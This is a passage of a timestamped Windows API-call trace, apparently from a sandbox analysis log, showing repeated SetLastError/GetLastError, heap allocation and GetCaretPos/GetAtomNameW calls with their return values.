SetLastError (dwErrCode=0x0) [0158.943] GetLastError () returned 0x0 [0158.943] SetLastError (dwErrCode=0x0) [0158.943] GetLastError () returned 0x0 [0158.943] SetLastError (dwErrCode=0x0) [0158.943] GetLastError () returned 0x0 [0158.943] SetLastError (dwErrCode=0x0) [0158.943] GetLastError () returned 0x0 [0158.943] SetLastError (dwErrCode=0x0) [0158.944] GetLastError () returned 0x0 [0158.944] SetLastError (dwErrCode=0x0) [0158.944] GetLastError () returned 0x0 [0158.944] SetLastError (dwErrCode=0x0) [0158.944] GetLastError () returned 0x0 [0158.944] SetLastError (dwErrCode=0x0) [0158.944] GetLastError () returned 0x0 [0158.944] SetLastError (dwErrCode=0x0) [0158.944] GetLastError () returned 0x0 [0158.945] SetLastError (dwErrCode=0x0) [0158.945] GetLastError () returned 0x0 [0158.945] SetLastError (dwErrCode=0x0) [0158.945] GetLastError () returned 0x0 [0158.945] SetLastError (dwErrCode=0x0) [0158.945] GetLastError () returned 0x0 [0158.945] SetLastError (dwErrCode=0x0) [0158.945] GetLastError () returned 0x0 [0158.946] SetLastError (dwErrCode=0x0) [0158.946] GetLastError () returned 0x0 [0158.946] SetLastError (dwErrCode=0x0) [0158.946] GetLastError () returned 0x0 [0158.946] SetLastError (dwErrCode=0x0) [0158.946] GetLastError () returned 0x0 [0158.946] SetLastError (dwErrCode=0x0) [0158.946] GetLastError () returned 0x0 [0158.947] SetLastError (dwErrCode=0x0) [0158.947] GetLastError () returned 0x0 [0158.947] SetLastError (dwErrCode=0x0) [0158.947] GetLastError () returned 0x0 [0158.947] SetLastError (dwErrCode=0x0) [0158.947] GetLastError () returned 0x0 [0158.947] SetLastError (dwErrCode=0x0) [0158.947] GetLastError () returned 0x0 [0158.948] SetLastError (dwErrCode=0x0) [0158.948] GetLastError () returned 0x0 [0158.948] SetLastError (dwErrCode=0x0) [0158.948] GetLastError () returned 0x0 [0158.948] SetLastError (dwErrCode=0x0) [0158.948] GetLastError () returned 0x0 [0158.948] SetLastError (dwErrCode=0x0) [0158.948] GetLastError () returned 0x0 [0158.949] SetLastError (dwErrCode=0x0) [0158.949] GetLastError () returned 0x0 [0158.949] SetLastError (dwErrCode=0x0) [0158.949] GetLastError () returned 0x0 [0158.949] SetLastError (dwErrCode=0x0) [0158.949] GetLastError () returned 0x0 [0158.949] SetLastError (dwErrCode=0x0) [0158.949] GetLastError () returned 0x0 [0158.949] SetLastError (dwErrCode=0x0) [0158.950] GetLastError () returned 0x0 [0158.950] SetLastError (dwErrCode=0x0) [0158.950] GetLastError () returned 0x0 [0158.950] SetLastError (dwErrCode=0x0) [0158.950] GetLastError () returned 0x0 [0158.950] SetLastError (dwErrCode=0x0) [0158.950] GetLastError () returned 0x0 [0158.950] SetLastError (dwErrCode=0x0) [0158.951] GetLastError () returned 0x0 [0158.951] SetLastError (dwErrCode=0x0) [0158.951] GetLastError () returned 0x0 [0158.951] SetLastError (dwErrCode=0x0) [0158.951] GetLastError () returned 0x0 [0158.951] SetLastError (dwErrCode=0x0) [0158.951] GetLastError () returned 0x0 [0158.952] SetLastError (dwErrCode=0x0) [0158.952] GetLastError () returned 0x0 [0158.952] SetLastError (dwErrCode=0x0) [0158.952] GetLastError () returned 0x0 [0158.952] SetLastError (dwErrCode=0x0) [0158.952] GetLastError () returned 0x0 [0158.952] SetLastError (dwErrCode=0x0) [0158.952] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa2) returned 0x3f1990 [0158.952] GetLastError () returned 0x0 [0158.953] SetLastError (dwErrCode=0x0) [0158.953] GetLastError () returned 0x0 [0158.953] SetLastError (dwErrCode=0x0) [0158.953] GetLastError () returned 0x0 [0158.953] SetLastError (dwErrCode=0x0) [0158.953] GetLastError () returned 0x0 [0158.953] SetLastError (dwErrCode=0x0) [0158.953] GetLastError () returned 0x0 [0158.954] SetLastError (dwErrCode=0x0) [0158.954] GetLastError () returned 0x0 [0158.954] SetLastError (dwErrCode=0x0) [0158.954] GetLastError () returned 0x0 [0158.954] SetLastError (dwErrCode=0x0) [0158.954] GetLastError () returned 0x0 [0158.954] SetLastError (dwErrCode=0x0) [0158.954] GetLastError () returned 0x0 [0158.954] SetLastError (dwErrCode=0x0) [0158.954] GetLastError () returned 0x0 [0158.954] SetLastError (dwErrCode=0x0) [0158.955] GetLastError () returned 0x0 [0158.955] SetLastError (dwErrCode=0x0) [0158.955] GetLastError () returned 0x0 [0158.955] SetLastError (dwErrCode=0x0) [0158.955] GetLastError () returned 0x0 [0158.955] SetLastError (dwErrCode=0x0) [0158.955] GetLastError () returned 0x0 [0158.955] SetLastError (dwErrCode=0x0) [0158.955] GetLastError () returned 0x0 [0158.955] SetLastError (dwErrCode=0x0) [0158.956] GetLastError () returned 0x0 [0158.956] SetLastError (dwErrCode=0x0) [0158.956] GetLastError () returned 0x0 [0158.956] SetLastError (dwErrCode=0x0) [0158.956] GetLastError () returned 0x0 [0158.956] SetLastError (dwErrCode=0x0) [0158.956] GetLastError () returned 0x0 [0158.956] SetLastError (dwErrCode=0x0) [0158.956] GetLastError () returned 0x0 [0158.956] SetLastError (dwErrCode=0x0) [0158.956] GetLastError () returned 0x0 [0158.957] SetLastError (dwErrCode=0x0) [0158.957] GetLastError () returned 0x0 [0158.957] SetLastError (dwErrCode=0x0) [0158.957] GetLastError () returned 0x0 [0158.957] SetLastError (dwErrCode=0x0) [0158.957] GetLastError () returned 0x0 [0158.957] SetLastError (dwErrCode=0x0) [0158.957] GetLastError () returned 0x0 [0158.957] SetLastError (dwErrCode=0x0) [0158.957] GetLastError () returned 0x0 [0158.957] SetLastError (dwErrCode=0x0) [0158.957] GetLastError () returned 0x0 [0158.958] SetLastError (dwErrCode=0x0) [0158.958] GetLastError () returned 0x0 [0158.958] SetLastError (dwErrCode=0x0) [0158.958] GetLastError () returned 0x0 [0158.958] SetLastError (dwErrCode=0x0) [0158.958] GetLastError () returned 0x0 [0158.958] SetLastError (dwErrCode=0x0) [0158.958] GetLastError () returned 0x0 [0158.958] SetLastError (dwErrCode=0x0) [0158.958] GetLastError () returned 0x0 [0158.959] SetLastError (dwErrCode=0x0) [0158.959] GetLastError () returned 0x0 [0158.960] SetLastError (dwErrCode=0x0) [0158.960] GetLastError () returned 0x0 [0158.960] SetLastError (dwErrCode=0x0) [0158.960] GetLastError () returned 0x0 [0158.961] SetLastError (dwErrCode=0x0) [0158.961] GetLastError () returned 0x0 [0158.961] SetLastError (dwErrCode=0x0) [0158.961] GetLastError () returned 0x0 [0158.961] SetLastError (dwErrCode=0x0) [0158.961] GetLastError () returned 0x0 [0158.961] SetLastError (dwErrCode=0x0) [0158.961] GetLastError () returned 0x0 [0158.961] SetLastError (dwErrCode=0x0) [0158.962] GetLastError () returned 0x0 [0158.962] SetLastError (dwErrCode=0x0) [0158.962] GetLastError () returned 0x0 [0158.962] SetLastError (dwErrCode=0x0) [0158.962] GetLastError () returned 0x0 [0158.962] SetLastError (dwErrCode=0x0) [0158.962] GetLastError () returned 0x0 [0158.962] SetLastError (dwErrCode=0x0) [0158.962] GetLastError () returned 0x0 [0158.962] SetLastError (dwErrCode=0x0) [0158.962] GetLastError () returned 0x0 [0158.963] SetLastError (dwErrCode=0x0) [0158.963] GetLastError () returned 0x0 [0158.963] SetLastError (dwErrCode=0x0) [0158.963] GetLastError () returned 0x0 [0158.963] SetLastError (dwErrCode=0x0) [0158.963] GetLastError () returned 0x0 [0158.963] SetLastError (dwErrCode=0x0) [0158.963] GetLastError () returned 0x0 [0158.964] SetLastError (dwErrCode=0x0) [0158.964] GetLastError () returned 0x0 [0158.964] SetLastError (dwErrCode=0x0) [0158.964] GetLastError () returned 0x0 [0158.964] SetLastError (dwErrCode=0x0) [0158.964] GetLastError () returned 0x0 [0158.964] SetLastError (dwErrCode=0x0) [0158.964] GetLastError () returned 0x0 [0158.964] SetLastError (dwErrCode=0x0) [0158.964] GetLastError () returned 0x0 [0158.965] SetLastError (dwErrCode=0x0) [0158.965] GetLastError () returned 0x0 [0158.965] SetLastError (dwErrCode=0x0) [0158.965] GetLastError () returned 0x0 [0158.965] SetLastError (dwErrCode=0x0) [0158.965] GetLastError () returned 0x0 [0158.965] SetLastError (dwErrCode=0x0) [0158.965] GetLastError () returned 0x0 [0158.965] SetLastError (dwErrCode=0x0) [0158.965] GetLastError () returned 0x0 [0158.965] SetLastError (dwErrCode=0x0) [0158.965] GetLastError () returned 0x0 [0158.966] SetLastError (dwErrCode=0x0) [0158.966] GetLastError () returned 0x0 [0158.966] SetLastError (dwErrCode=0x0) [0158.966] GetLastError () returned 0x0 [0158.966] SetLastError (dwErrCode=0x0) [0158.966] GetLastError () returned 0x0 [0158.966] SetLastError (dwErrCode=0x0) [0158.966] GetLastError () returned 0x0 [0158.966] SetLastError (dwErrCode=0x0) [0158.966] GetLastError () returned 0x0 [0158.966] SetLastError (dwErrCode=0x0) [0158.966] GetLastError () returned 0x0 [0158.966] SetLastError (dwErrCode=0x0) [0158.966] GetLastError () returned 0x0 [0158.966] SetLastError (dwErrCode=0x0) [0158.966] GetLastError () returned 0x0 [0158.967] SetLastError (dwErrCode=0x0) [0158.967] GetLastError () returned 0x0 [0158.967] SetLastError (dwErrCode=0x0) [0158.967] GetLastError () returned 0x0 [0158.967] SetLastError (dwErrCode=0x0) [0158.967] GetLastError () returned 0x0 [0158.967] SetLastError (dwErrCode=0x0) [0158.967] GetLastError () returned 0x0 [0158.967] SetLastError (dwErrCode=0x0) [0158.967] GetLastError () returned 0x0 [0158.967] SetLastError (dwErrCode=0x0) [0158.967] GetLastError () returned 0x0 [0158.967] SetLastError (dwErrCode=0x0) [0158.967] GetLastError () returned 0x0 [0158.968] SetLastError (dwErrCode=0x0) [0158.968] GetLastError () returned 0x0 [0158.968] SetLastError (dwErrCode=0x0) [0158.968] GetLastError () returned 0x0 [0158.968] SetLastError (dwErrCode=0x0) [0158.968] GetLastError () returned 0x0 [0158.968] SetLastError (dwErrCode=0x0) [0158.968] GetLastError () returned 0x0 [0158.968] SetLastError (dwErrCode=0x0) [0158.968] GetLastError () returned 0x0 [0158.968] SetLastError (dwErrCode=0x0) [0158.968] GetLastError () returned 0x0 [0158.969] SetLastError (dwErrCode=0x0) [0158.969] GetLastError () returned 0x0 [0158.969] SetLastError (dwErrCode=0x0) [0158.969] GetLastError () returned 0x0 [0158.969] SetLastError (dwErrCode=0x0) [0158.969] GetLastError () returned 0x0 [0158.969] SetLastError (dwErrCode=0x0) [0158.969] GetLastError () returned 0x0 [0158.969] SetLastError (dwErrCode=0x0) [0158.969] GetLastError () returned 0x0 [0158.969] SetLastError (dwErrCode=0x0) [0158.969] GetLastError () returned 0x0 [0158.969] SetLastError (dwErrCode=0x0) [0158.970] GetLastError () returned 0x0 [0158.970] SetLastError (dwErrCode=0x0) [0158.970] GetLastError () returned 0x0 [0158.970] SetLastError (dwErrCode=0x0) [0158.970] GetLastError () returned 0x0 [0158.970] SetLastError (dwErrCode=0x0) [0158.970] GetLastError () returned 0x0 [0158.970] SetLastError (dwErrCode=0x0) [0158.970] GetLastError () returned 0x0 [0158.970] SetLastError (dwErrCode=0x0) [0158.970] GetLastError () returned 0x0 [0158.970] SetLastError (dwErrCode=0x0) [0158.970] GetLastError () returned 0x0 [0158.971] SetLastError (dwErrCode=0x0) [0158.971] GetLastError () returned 0x0 [0158.971] SetLastError (dwErrCode=0x0) [0158.971] GetLastError () returned 0x0 [0158.971] SetLastError (dwErrCode=0x0) [0158.971] GetLastError () returned 0x0 [0158.971] SetLastError (dwErrCode=0x0) [0158.971] GetLastError () returned 0x0 [0158.971] SetLastError (dwErrCode=0x0) [0158.971] GetLastError () returned 0x0 [0158.971] SetLastError (dwErrCode=0x0) [0158.971] GetLastError () returned 0x0 [0158.972] SetLastError (dwErrCode=0x0) [0158.972] GetLastError () returned 0x0 [0158.972] SetLastError (dwErrCode=0x0) [0158.972] GetLastError () returned 0x0 [0158.972] SetLastError (dwErrCode=0x0) [0158.972] GetLastError () returned 0x0 [0158.972] SetLastError (dwErrCode=0x0) [0158.972] GetLastError () returned 0x0 [0158.972] SetLastError (dwErrCode=0x0) [0158.972] GetLastError () returned 0x0 [0158.973] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0158.973] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0158.973] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x80) returned 0x3f11f8 [0158.974] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40467c) returned 0x0 [0158.974] RtlSizeHeap (HeapHandle=0x3f0000, Flags=0x0, MemoryPointer=0x3f11f8) returned 0x80 [0158.974] GetLastError () returned 0x0 [0159.348] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.348] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.348] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.348] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.348] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.348] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.348] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.349] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.349] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.349] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.349] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.349] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.349] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.349] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.349] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.349] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.349] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.349] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.349] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.349] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.350] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.350] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.350] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.350] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.350] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.350] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.350] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.350] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.350] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.350] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.350] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.350] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.350] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.350] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.350] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.350] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.350] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.350] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.350] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.350] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.351] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.351] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.351] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.351] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.351] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.351] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.351] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.351] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.351] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.351] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.351] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.351] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.351] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.351] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.351] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.351] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.351] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.351] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.351] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.351] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.351] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.352] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.352] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.352] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.352] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.352] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.352] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.352] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.352] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.352] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.352] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.352] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.352] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.352] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.352] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.352] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.352] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.352] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.352] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.352] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.353] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.353] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.353] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.353] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.353] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.353] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.353] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.353] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.353] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.353] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.353] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.353] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.353] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.353] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.353] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.353] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.353] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.353] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.353] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.353] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.354] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.354] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.354] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.354] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.354] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.354] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.354] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.354] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.354] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.354] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.354] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.354] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.354] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.354] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.354] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.354] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.354] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.354] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.354] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.354] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.354] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.355] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.355] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.355] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.355] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.355] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.355] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.355] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.355] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.355] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.355] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.355] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.355] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.356] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.356] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.356] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.356] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.356] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) returned 1 [0159.356] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0159.356] GetCaretPos (in: lpPoint=0x18ee64 | out: lpPoint=0x18ee64) 